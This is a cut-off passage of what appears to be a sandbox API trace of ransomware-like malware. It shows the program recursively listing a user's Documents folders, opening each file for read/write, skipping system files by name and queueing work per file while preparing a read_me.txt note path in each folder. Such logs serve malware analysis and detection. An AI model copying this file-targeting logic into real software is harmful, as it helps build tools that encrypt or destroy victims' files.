Context=0x8a0, Flags=0x0) returned 1 [0076.022] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23658d0, ftCreationTime.dwHighDateTime=0x1d4d3b9, ftLastAccessTime.dwLowDateTime=0xb3b72b00, ftLastAccessTime.dwHighDateTime=0x1d4d158, ftLastWriteTime.dwLowDateTime=0xb3b72b00, ftLastWriteTime.dwHighDateTime=0x1d4d158, nFileSizeHigh=0x0, nFileSizeLow=0x6d68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u_S_Ou6zrS.rtf", cAlternateFileName="U_S_OU~1.RTF")) returned 1 [0076.022] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\u_S_Ou6zrS.rtf") returned 96 [0076.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\u_S_Ou6zrS.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\-qlf9qdmx0yqxmstexaw\\u_s_ou6zrs.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a4 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="read_me.txt") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="autoexec.bat") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="desktop.ini") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="autorun.inf") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="ntuser.dat") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="iconcache.db") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="bootsect.bak") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="boot.ini") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="ntuser.dat.log") returned 0x0 [0076.022] StrStrW (lpFirst="u_s_ou6zrs.rtf", lpSrch="thumbs.db") returned 0x0 [0076.022] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 74 [0076.022] QueueUserWorkItem (Function=0x404e00, Context=0x8a4, Flags=0x0) returned 1 [0076.022] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe23658d0, ftCreationTime.dwHighDateTime=0x1d4d3b9, ftLastAccessTime.dwLowDateTime=0xb3b72b00, ftLastAccessTime.dwHighDateTime=0x1d4d158, ftLastWriteTime.dwLowDateTime=0xb3b72b00, ftLastWriteTime.dwHighDateTime=0x1d4d158, nFileSizeHigh=0x0, nFileSizeLow=0x6d68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="u_s_ou6zrs.rtf", cAlternateFileName="U_S_OU~1.RTF")) returned 0 [0076.023] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.023] wnsprintfW (in: pszDest=0x8e31128, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\-qLf9qdmX0YqXMSteXaW\\read_me.txt") returned 93 [0076.023] GetProcessHeap () returned 0x4f10000 [0076.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8e31128 | out: hHeap=0x4f10000) returned 1 [0076.023] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 46 [0076.023] GetProcessHeap () returned 0x4f10000 [0076.023] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bb00e0 | out: hHeap=0x4f10000) returned 1 [0076.023] GetProcessHeap () returned 0x4f10000 [0076.023] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8bb00e0 [0076.023] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\*") returned 79 [0076.023] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff48390, ftCreationTime.dwHighDateTime=0x1d4d5ab, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.023] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\.") returned 79 [0076.023] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeff48390, ftCreationTime.dwHighDateTime=0x1d4d5ab, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.023] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\..") returned 80 [0076.023] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfb51c20, ftCreationTime.dwHighDateTime=0x1d4cdb3, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2x0rhX3GpeC7V", cAlternateFileName="2X0RHX~1")) returned 1 [0076.023] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V") returned 91 [0076.023] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe7a0f90, ftCreationTime.dwHighDateTime=0x1d4ca00, ftLastAccessTime.dwLowDateTime=0x885d3760, ftLastAccessTime.dwHighDateTime=0x1d4c7b7, ftLastWriteTime.dwLowDateTime=0x885d3760, ftLastWriteTime.dwHighDateTime=0x1d4c7b7, nFileSizeHigh=0x0, nFileSizeLow=0x11036, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9jFQ OhEgtOJ1L.ots", cAlternateFileName="9JFQOH~1.OTS")) returned 1 [0076.023] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\9jFQ OhEgtOJ1L.ots") returned 96 [0076.023] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\9jFQ OhEgtOJ1L.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\9jfq ohegtoj1l.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8a8 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="read_me.txt") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="autoexec.bat") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="desktop.ini") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="autorun.inf") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="ntuser.dat") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="iconcache.db") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="bootsect.bak") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="boot.ini") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="ntuser.dat.log") returned 0x0 [0076.030] StrStrW (lpFirst="9jfq ohegtoj1l.ots", lpSrch="thumbs.db") returned 0x0 [0076.030] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 75 [0076.030] QueueUserWorkItem (Function=0x404e00, Context=0x8a8, Flags=0x0) returned 1 [0076.030] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f7cb500, ftCreationTime.dwHighDateTime=0x1d4cc2f, ftLastAccessTime.dwLowDateTime=0x3d7466c0, ftLastAccessTime.dwHighDateTime=0x1d4d45e, ftLastWriteTime.dwLowDateTime=0x3d7466c0, ftLastWriteTime.dwHighDateTime=0x1d4d45e, nFileSizeHigh=0x0, nFileSizeLow=0xf820, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ENUz6f.pps", cAlternateFileName="")) returned 1 [0076.030] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\ENUz6f.pps") returned 88 [0076.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\ENUz6f.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\enuz6f.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8ac [0076.030] StrStrW (lpFirst="enuz6f.pps", lpSrch="read_me.txt") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="autoexec.bat") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="desktop.ini") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="autorun.inf") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="ntuser.dat") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="iconcache.db") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="bootsect.bak") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="boot.ini") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="ntuser.dat.log") returned 0x0 [0076.031] StrStrW (lpFirst="enuz6f.pps", lpSrch="thumbs.db") returned 0x0 [0076.031] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 76 [0076.031] QueueUserWorkItem (Function=0x404e00, Context=0x8ac, Flags=0x0) returned 1 [0076.031] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc87179b0, ftCreationTime.dwHighDateTime=0x1d4c645, ftLastAccessTime.dwLowDateTime=0x176719c0, ftLastAccessTime.dwHighDateTime=0x1d4c6b5, ftLastWriteTime.dwLowDateTime=0x176719c0, ftLastWriteTime.dwHighDateTime=0x1d4c6b5, nFileSizeHigh=0x0, nFileSizeLow=0x49b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fu2JzaZ.pdf", cAlternateFileName="")) returned 1 [0076.031] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\fu2JzaZ.pdf") returned 89 [0076.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\fu2JzaZ.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\fu2jzaz.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="read_me.txt") returned 0x0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="autoexec.bat") returned 0x0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="desktop.ini") returned 0x0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="autorun.inf") returned 0x0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="ntuser.dat") returned 0x0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="iconcache.db") returned 0x0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="bootsect.bak") returned 0x0 [0076.031] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="boot.ini") returned 0x0 [0076.032] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="ntuser.dat.log") returned 0x0 [0076.032] StrStrW (lpFirst="fu2jzaz.pdf", lpSrch="thumbs.db") returned 0x0 [0076.032] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 77 [0076.032] QueueUserWorkItem (Function=0x404e00, Context=0x8b0, Flags=0x0) returned 1 [0076.032] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xda26f1d0, ftCreationTime.dwHighDateTime=0x1d4c9a1, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mK_tjRRPSh202XbyB", cAlternateFileName="MK_TJR~1")) returned 1 [0076.032] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\mK_tjRRPSh202XbyB") returned 95 [0076.032] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23149020, ftCreationTime.dwHighDateTime=0x1d4cb1c, ftLastAccessTime.dwLowDateTime=0x43f5c140, ftLastAccessTime.dwHighDateTime=0x1d4c85d, ftLastWriteTime.dwLowDateTime=0x43f5c140, ftLastWriteTime.dwHighDateTime=0x1d4c85d, nFileSizeHigh=0x0, nFileSizeLow=0x2457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QnKnm4tcyo8Rs.docx", cAlternateFileName="QNKNM4~1.DOC")) returned 1 [0076.032] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\QnKnm4tcyo8Rs.docx") returned 96 [0076.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\QnKnm4tcyo8Rs.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\qnknm4tcyo8rs.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b4 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="read_me.txt") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="autoexec.bat") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="desktop.ini") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="autorun.inf") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="ntuser.dat") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="iconcache.db") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="bootsect.bak") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="boot.ini") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="ntuser.dat.log") returned 0x0 [0076.032] StrStrW (lpFirst="qnknm4tcyo8rs.docx", lpSrch="thumbs.db") returned 0x0 [0076.032] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 78 [0076.032] QueueUserWorkItem (Function=0x404e00, Context=0x8b4, Flags=0x0) returned 1 [0076.032] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2473d8e0, ftCreationTime.dwHighDateTime=0x1d5a041, ftLastAccessTime.dwLowDateTime=0x2473d8e0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x2473d8e0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0076.032] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\read_me.txt") returned 89 [0076.032] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b8 [0076.033] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0076.033] CloseHandle (hObject=0x8b8) returned 1 [0076.033] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbba293c0, ftCreationTime.dwHighDateTime=0x1d4d524, ftLastAccessTime.dwLowDateTime=0x4be4fff0, ftLastAccessTime.dwHighDateTime=0x1d4c9cb, ftLastWriteTime.dwLowDateTime=0x4be4fff0, ftLastWriteTime.dwHighDateTime=0x1d4c9cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfe6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_ak74NgfXD6KjNd l.ppt", cAlternateFileName="_AK74N~1.PPT")) returned 1 [0076.033] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\_ak74NgfXD6KjNd l.ppt") returned 99 [0076.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\_ak74NgfXD6KjNd l.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\8bn0vyqigbef7_rt\\cxq6nutj 99v2-v6\\_ak74ngfxd6kjnd l.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8b8 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="read_me.txt") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="autoexec.bat") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="desktop.ini") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="autorun.inf") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="ntuser.dat") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="iconcache.db") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="bootsect.bak") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="boot.ini") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="ntuser.dat.log") returned 0x0 [0076.033] StrStrW (lpFirst="_ak74ngfxd6kjnd l.ppt", lpSrch="thumbs.db") returned 0x0 [0076.033] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 79 [0076.033] QueueUserWorkItem (Function=0x404e00, Context=0x8b8, Flags=0x0) returned 1 [0076.033] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbba293c0, ftCreationTime.dwHighDateTime=0x1d4d524, ftLastAccessTime.dwLowDateTime=0x4be4fff0, ftLastAccessTime.dwHighDateTime=0x1d4c9cb, ftLastWriteTime.dwLowDateTime=0x4be4fff0, ftLastWriteTime.dwHighDateTime=0x1d4c9cb, nFileSizeHigh=0x0, nFileSizeLow=0xdfe6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_ak74ngfxd6kjnd l.ppt", cAlternateFileName="_AK74N~1.PPT")) returned 0 [0076.033] FindClose (in: hFindFile=0x7cfe968 | out: hFindFile=0x7cfe968) returned 1 [0076.033] wnsprintfW (in: pszDest=0x8bb00e0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\read_me.txt") returned 89 [0076.033] GetProcessHeap () returned 0x4f10000 [0076.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bb00e0 | out: hHeap=0x4f10000) returned 1 [0076.034] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 47 [0076.034] GetProcessHeap () returned 0x4f10000 [0076.034] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8bc00e8 | out: hHeap=0x4f10000) returned 1 [0076.034] GetProcessHeap () returned 0x4f10000 [0076.034] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0xfffe) returned 0x8b00088 [0076.034] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\*") returned 93 [0076.034] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\*", lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfb51c20, ftCreationTime.dwHighDateTime=0x1d4cdb3, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7cfe968 [0076.034] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\.") returned 93 [0076.034] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfb51c20, ftCreationTime.dwHighDateTime=0x1d4cdb3, ftLastAccessTime.dwLowDateTime=0x246cb4c0, ftLastAccessTime.dwHighDateTime=0x1d5a041, ftLastWriteTime.dwLowDateTime=0x246cb4c0, ftLastWriteTime.dwHighDateTime=0x1d5a041, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0076.034] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\..") returned 94 [0076.034] FindNextFileW (in: hFindFile=0x7cfe968, lpFindFileData=0x84afb60 | out: lpFindFileData=0x84afb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22215060, ftCreationTime.dwHighDateTime=0x1d4d439, ftLastAccessTime.dwLowDateTime=0xd222d3b0, ftLastAccessTime.dwHighDateTime=0x1d4d4f9, ftLastWriteTime.dwLowDateTime=0xd222d3b0, ftLastWriteTime.dwHighDateTime=0x1d4d4f9, nFileSizeHigh=0x0, nFileSizeLow=0x8023, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="--wFzQ_fQiax.ods", cAlternateFileName="--WFZQ~1.ODS")) returned 1 [0076.034] wnsprintfW (in: pszDest=0x8b00088, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 99V2-v6\\2x0rhX3GpeC7V\\--wFzQ_fQiax.ods") returned 108 [0076.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8Bn0vYqIGbef7_rt\\CXq6NUTJ 